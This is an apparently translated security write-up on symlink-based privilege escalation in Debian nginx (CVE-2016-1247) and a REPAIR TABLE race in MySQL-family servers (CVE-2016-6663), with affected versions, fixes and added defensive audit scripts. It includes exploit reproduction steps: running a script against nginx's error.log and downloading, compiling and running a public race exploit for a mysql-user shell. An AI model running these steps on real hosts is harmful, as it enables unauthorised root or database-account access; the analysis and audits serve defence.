Foreword
Linux has a powerful file-permission model. In day-to-day use it is very convenient, but permissions that are handled carelessly create real security risk. A typical case: a privileged process changes the owner or mode of files inside a directory that an unprivileged user controls. That user can first replace the target with a symbolic link to a system file; the privileged process then follows the link and changes the owner or mode of the system file instead. An attacker uses this to hijack a shared library, or to modify a script that runs on a schedule, and thereby escalates privileges.
Cases
Nginx CVE-2016-1247
Affected versions
Debian*
Vulnerability principle
On Debian-based systems, nginx installed with the default apt-get package sets the owner of the log directory to www-data:
```
yaseng@ubuntu:/tmp$ ls -ld /var/log/nginx/
drwxr-x--- 2 www-data adm 4096 Nov 21 17:42 /var/log/nginx/
```
Because www-data owns the directory, an attacker running as www-data can replace a log file with a symbolic link that points at a file www-data has no permission to write, for example /etc/ld.so.preload (the shared-library preload list). When nginx is restarted, it follows the link and changes the owner of /etc/ld.so.preload to www-data. The attacker can then write the preload list and hijack the environment of every dynamically linked program, including those running as root.
nginx also ships a scheduled script (/etc/logrotate.d/nginx, run from the daily cron job at 06:25) that restarts nginx and resets the log permissions. The attacker therefore only needs a script that watches until /etc/ld.so.preload becomes writable and then writes the path of a privilege-escalating .so file into it.
Vulnerability testing
Environment: Ubuntu 15.04
exploit: <http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html>
Install: sudo apt-get install nginx
Escalate privileges
```
www-data@ubuntu:/tmp$ pwd
/tmp
www-data@ubuntu:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/tmp$ file 4.sh
www-data@ubuntu:/tmp$ ./4.sh /var/log/nginx/error.log
```
Wait for nginx to be restarted (the daily logrotate run); once it has, the script obtains root.
[screenshot: nginx_1]
Fix
Make the log directory and its files owned by root rather than www-data, so the service account can no longer replace a log file with a symbolic link that nginx will follow.
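To check a host for the conditions this section relies on (a log directory owned by a non-root service account, a log file that has been turned into a symbolic link, and a preload file that is no longer root-only), here is an added audit script in POSIX sh. It is not part of the original post or of the nginx project; the function names and the constructed temporary tree used by `demo` are my own, and it needs GNU `stat`. The ownership checks compare against root, so it can be run as any user.

```shell
#!/bin/sh
# Added example (not from the original post): audit a log directory and a
# preload file for the CVE-2016-1247 pattern. Paths are parameters so the
# functions work on a constructed test tree as well as on /var/log/nginx.

# 0 (finding) if the directory is owned by someone other than root, i.e. the
# service account can rename log files and replace them with symlinks.
logdir_owned_by_nonroot() {
    owner=$(stat -c '%U' "$1") || return 1
    [ "$owner" != root ]
}

# 0 (finding) if any entry in the directory is a symbolic link: a log file
# that is a symlink is the attack in progress, waiting for the next restart.
logdir_has_symlink() {
    for f in "$1"/* "$1"/.[!.]*; do
        [ -L "$f" ] && return 0
    done
    return 1
}

# 0 (finding) if the preload file exists and is owned by a non-root user or is
# group/world writable. A missing /etc/ld.so.preload is the normal state.
preload_is_tampered() {
    [ -e "$1" ] || return 1
    owner=$(stat -c '%U' "$1")
    mode=$(stat -c '%a' "$1")
    [ "$owner" != root ] && return 0
    case "$mode" in
        *[2367]|*[2367]?) return 0 ;;   # other- or group-writable
    esac
    return 1
}

# Run all three checks; returns 1 if anything was found.
audit() {
    rc=0
    if logdir_owned_by_nonroot "$1"; then echo "WARN: $1 is owned by a non-root user"; rc=1; fi
    if logdir_has_symlink "$1";      then echo "WARN: symbolic link found in $1"; rc=1; fi
    if preload_is_tampered "$2";     then echo "WARN: $2 is writable by non-root"; rc=1; fi
    return $rc
}

# Constructed demo tree: a log directory whose error.log is already a symlink
# to a writable "preload" file, the state just before nginx is restarted.
demo() {
    t=$(mktemp -d)
    mkdir "$t/nginx"
    ln -s "$t/preload" "$t/nginx/error.log"
    : > "$t/preload"; chmod 0666 "$t/preload"
    audit "$t/nginx" "$t/preload"; r=$?
    rm -rf "$t"
    return $r
}

if demo; then echo "demo: clean"; else echo "demo: findings reported (exit 1)"; fi
```

On a real host run `audit /var/log/nginx /etc/ld.so.preload`; a clean Debian install reports only the first warning, which is exactly the condition the fix removes.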
MySQL CVE-2016-6663
Affected versions
MariaDB
< 5.5.52
< 10.1.18
< 10.0.28
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
Vulnerability principle
When MySQL or one of its derivatives repairs a table (REPAIR TABLE xxx), the server creates a temporary file xxx.TMD in the database directory and then changes its permissions, and the mode it applies can include the setuid bit while the file is owned by the mysql user. Because the data directory is under the database user's control, the attacker races the repair: between the creation of xxx.TMD and the permission change, the file is replaced with a copy of another executable (for example /bin/bash). That executable ends up setuid mysql and running it gives an interactive shell as the mysql user, i.e. escalation from a web or database account to the mysql system user.
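As an added example (not code from the original post or from the MySQL project), the POSIX sh functions below encode the affected-version table above, check a flavour/version pair against it, and then look for the artifact this race leaves behind: a setuid file inside the data directory. The flavour names (mysql, mariadb, percona, pxc), the function names and the temporary directory are my own choices; Percona's hyphenated release suffixes are compared as extra dotted components, which generalises the comparison beyond the single version the page tests.

```shell
#!/bin/sh
# Added example, not from the original post or from MySQL: version check
# against the CVE-2016-6663 table above plus a check for the setuid artifact
# the race leaves in the data directory. Flavour/function names are my own.

# Compare two dotted version strings component by component; prints -1, 0 or 1.
vercmp() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        if [ "$a" = "$x" ]; then a=''; else a=${a#*.}; fi
        if [ "$b" = "$y" ]; then b=''; else b=${b#*.}; fi
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then echo -1; return; fi
        if [ "$x" -gt "$y" ]; then echo 1; return; fi
    done
    echo 0
}

# Returns 0 if FLAVOUR VERSION falls in an affected range from the table above,
# 1 if not, 2 for an unknown flavour. Hyphens in Percona versions are turned
# into dots so that 5.5.51-38.1 sorts below 5.5.51-38.2.
mysql_vulnerable() {
    flavour=$1
    ver=$(printf '%s' "$2" | sed 's/-/./g')
    case "$flavour" in
        mysql)   ranges='5.5:<=5.5.51 5.6:<=5.6.32 5.7:<=5.7.14' ;;
        mariadb) ranges='5.5:<5.5.52 10.0:<10.0.28 10.1:<10.1.18' ;;
        percona) ranges='5.5:<5.5.51.38.2 5.6:<5.6.32.78.1 5.7:<5.7.14.8' ;;
        pxc)     ranges='5.5:<5.5.41.37.0 5.6:<5.6.32.25.17 5.7:<5.7.14.26.17' ;;
        *)       return 2 ;;
    esac
    branch=$(printf '%s' "$ver" | cut -d. -f1,2)
    for r in $ranges; do
        [ "${r%%:*}" = "$branch" ] || continue
        bound=${r#*:}
        case "$bound" in
            '<='*) [ "$(vercmp "$ver" "${bound#"<="}")" -le 0 ] && return 0 ;;
            '<'*)  [ "$(vercmp "$ver" "${bound#"<"}")" -lt 0 ] && return 0 ;;
        esac
        return 1    # listed branch, but at or past the fixed release
    done
    return 1        # branch not in the table (e.g. 8.0)
}

# Lists regular files carrying the setuid bit under a data directory. After a
# successful run of the race this is where the setuid copy of bash sits.
setuid_in_datadir() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Stand-alone run: the version from the page's own test environment.
if mysql_vulnerable mysql 5.6.28; then echo "mysql 5.6.28: affected"; fi
```

On a real server pass the flavour and the version string reported by `mysqld --version`, and point `setuid_in_datadir` at the server's data directory (/var/lib/mysql on a default Debian install).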
Vulnerability testing
Environment: Ubuntu 15.04 Mysql 5.6.28
exploit:<http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c>
Run
```
yaseng@ubuntu:/tmp$ sudo apt-get install mysql-server mysql-client
yaseng@ubuntu:/tmp$ sudo service mysqld restart
yaseng@ubuntu:/tmp$ wget http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
yaseng@ubuntu:/tmp$ gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
yaseng@ubuntu:/tmp$ ./mysql-privesc-race test test localhost test
```
Screenshots
[screenshot: mysql_1]
Fix
<https://github.com/mysql/mysql-server/commit/4e5473862e6852b0f3802b0cd0c6fa10b5253291>